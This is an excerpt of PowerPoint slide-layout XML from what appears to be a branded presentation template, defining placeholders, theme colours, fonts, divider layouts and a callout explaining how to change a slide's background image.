        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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7" y="4823012"/>
            <a:ext cx="7041033" cy="507892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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7" y="5348834"/>
            <a:ext cx="7041033" cy="281002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="16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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27010320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plum_#_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>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99784982-D915-4281-8B9B-A7D6715DBB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="267316" y="738369"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78036A-3996-49A3-A390-73E198A66E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671983" y="1559955"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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7" y="4823012"/>
            <a:ext cx="7041033" cy="507892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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7" y="5348834"/>
            <a:ext cx="7041033" cy="281002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="16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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31993347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dark plum_#_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent6"/>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99784982-D915-4281-8B9B-A7D6715DBB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="267316" y="738369"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78036A-3996-49A3-A390-73E198A66E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671983" y="1559955"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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7" y="4823012"/>
            <a:ext cx="7041033" cy="507892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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7" y="5348834"/>
            <a:ext cx="7041033" cy="281002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="16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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="723065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on orange">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent3"/>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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6719D381-09F4-4A49-98C5-EB6F9556698A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19055189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image_#_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>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99784982-D915-4281-8B9B-A7D6715DBB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="267316" y="738369"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78036A-3996-49A3-A390-73E198A66E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671983" y="1559955"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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7" y="4823012"/>
            <a:ext cx="7041033" cy="507892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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7" y="5348834"/>
            <a:ext cx="7041033" cy="281002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="16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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Callout: Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D97716-E4A9-4B0C-B27E-A052426CCE71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12856683" y="0"/>
            <a:ext cx="2038121" cy="4617720"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 23170"/>
              <a:gd name="adj4" fmla="val -23198"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to change image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Choose ‘Slide Master’ </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Insert image and size to fit the page (make sure the coloured strip isn’t covered on the right hand side)</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Right click on the image and choose ‘send to back’</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 View ‘normal’ to exit Slide Master Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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59185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whit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8" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33451721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8" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14137819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ivider yellow">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8" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36821923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orang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8" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40109659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vider pink">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8" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25244481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plum">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8" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7937949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dark plum">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8" y="1791348"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3554388"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0BBB6B-44CC-4E98-BE0F-71A3D8455335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12073965" y="-3096"/>
            <a:ext cx="127000" cy="6858000"/>
            <a:chOff x="12061904" y="-3096"/>
            <a:chExt cx="127000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform: Shape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F4D043-1FE5-4ED9-9932-3CEED06E6E97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="-3096"/>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500D29"/>
            </a:solidFill>
            <a:ln w="6191"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99CF8AB0-367A-401F-B098-7A0A7413D4E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="758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96172B"/>
            </a:solidFill>
            <a:ln w="6191"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FC408E18-984C-416C-B657-99E4A61B9D8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="377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650E35"/>
            </a:solidFill>
            <a:ln w="6191"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CB07E4C3-8213-49FF-B059-2AD5E0D213F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="1139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AA1830"/>
            </a:solidFill>
            <a:ln w="619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FF29EFF2-F833-4CD2-8D64-9B9F79A3E72A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="3044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AA1830"/>
            </a:solidFill>
            <a:ln w="6191"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30A60626-F264-4A07-8AEA-1B531EA93739}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="3806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500D29"/>
            </a:solidFill>
            <a:ln w="6191"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76062C71-59DE-4B7C-8CDA-75A52C6715CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="3425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96172B"/>
            </a:solidFill>
            <a:ln w="6191"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ED3BFF26-ACF4-4536-BB0A-04020518E929}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12061904" y="4187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650E35"/>
            </a:solidFill>
            <a:ln w="6191"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CC25D427-E911-4D63-9695-D7CB94E38D8D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
